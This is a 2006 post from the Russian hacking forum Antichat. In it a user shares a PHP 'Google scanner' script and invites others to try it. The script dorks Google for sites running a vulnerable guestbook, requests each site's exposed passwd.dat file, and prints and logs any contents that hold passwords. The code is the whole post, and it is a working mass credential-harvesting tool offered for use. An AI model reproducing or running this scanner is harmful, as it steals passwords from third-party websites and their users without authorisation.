Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
23.10.2006, 20:25
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме:
3895065
Репутация:
1112
|
|
Гугля сканер
пробуйте )
?>
PHP код:
<html>
<META HTTP-EQUIV=Content-Type CONTENT=text/html; charset='windows-1251'>
<title>Гугля сканер)</title>
<body bgcolor="black">
<pre><font face="Verdana" color="#00CC00">
<?php
if (isset($_GET['host'])) $host = $_GET['host'];
else $host = 'www.google.com'; // поисковый сервер
if (isset($_GET['path'])) $path = $_GET['path'];
else $path = 'gb/'; // путь к скрипту поиска
if (isset($_GET['script_name'])) $script_name = $_GET['script_name'];
else $script_name = 'index.php'; // имя файла бажного скрипта
if (isset($_GET['query'])) $query = $_GET['query'];
else $query = 'search?q=allintitle:s+r+guestbook+v1.3&num=100&hl=en'; // запрос
$SPLOIT_STRING = 'passwd.dat'; // самое главное - эксплоит
function grab_links($host, $path, $html_source) // эта функция выдирает все ссылки
{
global $log, $links;
$log = fopen("goodebug.txt", "ab+"); // откроем файл для записи логов
// Регулярное выражение для поиска всех ссылок
preg_match_all("#<a.*?href=\"?'?([^\s\"'>]+)\"?'?.*?>(.*?)</a>#is", $html_source, $links);
for ($i=0; $i<count($links[1]); $i++)
{
// сделаем из относительных ссылок абсолютные
if (strpos($links[1][$i],"http") === false) $links[1][$i] = 'http://'.$host.$path.$links[1][$i];
echo $links[1][$i]."\r\n";
fputs($log, $links[1][$i]."\r\n"); // пишем все нефильтрованные ссылки в лог - на всякий случай, а вдруг у меня фильтр через жопу написан? =)
}
echo "\r\n";
}
$socket = fsockopen($host, 80); // коннектимся...
if (!$socket)
{
echo "Unable to connect to target server <b>\"$host\"</b>\r\n";
die("Socket Error =("); // коннекта нету =(
}
else
{ // формируем GET запрос к веб-серверу
$GET_query =
"GET ".$path.$query." HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en\r\n".
"User-Agent: Sad Internet Spider v1.0\r\n".
"Host: $host\r\n".
"Connection: Close\r\n\r\n";
fputs($socket, $GET_query);
while (!feof($socket))
{
$html_source .= fgets($socket, 256); // получаем данные из сокета
}
grab_links($host, $path, $html_source); // выдираем ссылки
for ($i=0; $i<count($links[1]); $i++) // проходим все ссылки и обрабатываем их
{
if ((strpos($links[1][$i],"search") === false) && (strpos($links[1][$i], 'google') === false))
{ // фильтруем левые ссылки
$good_link = substr($links[1][$i], 0, strpos($links[1][$i], $script_name));
if ($good_link)
{ // нашли "хорошую" ссылку
fputs($log, "Good link: ".$good_link."\r\n"); // запишем-ка мы ее в лог
$file = @fopen($good_link.$SPLOIT_STRING, "rb"); // пытаемся слить файл
if (!$file) fputs($log, "Cannot open file: ".$good_link.$SPLOIT_STRING."\r\n"); // облом =(
else
{ // успешно открыли файл
fputs($log, "File ".$good_link.$SPLOIT_STRING." successfully opened.\r\n");
while (!feof($file))
{
$result .= fgets($file, 256); // долгожданный результат =)
}
if (strpos($result, 'Password') === false) // если пассов нет
{
echo "\r\n Тут нет пароля =( ( бля) ".$good_link.$SPLOIT_STRING." \r\n";
unset($result);
}
else
{ // если все путем
echo "\r\nFile from ".$good_link.":\r\n".htmlspecialchars($result)."\r\n";
fputs(fopen("goolog.txt", "ab+"), "\r\nFile from ".$good_link.":\r\n".$result."\r\n");
unset($result);
}
} // обработали файл
} // конец обработки "хорошей" ссылки
} // конец фильтра левых ссылок
} // конец обработки всех ссылок
}
?>
</font></pre></body></html>
типо в стиле Ачата (цвета  )
Последний раз редактировалось SMiX; 23.10.2006 в 21:24..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид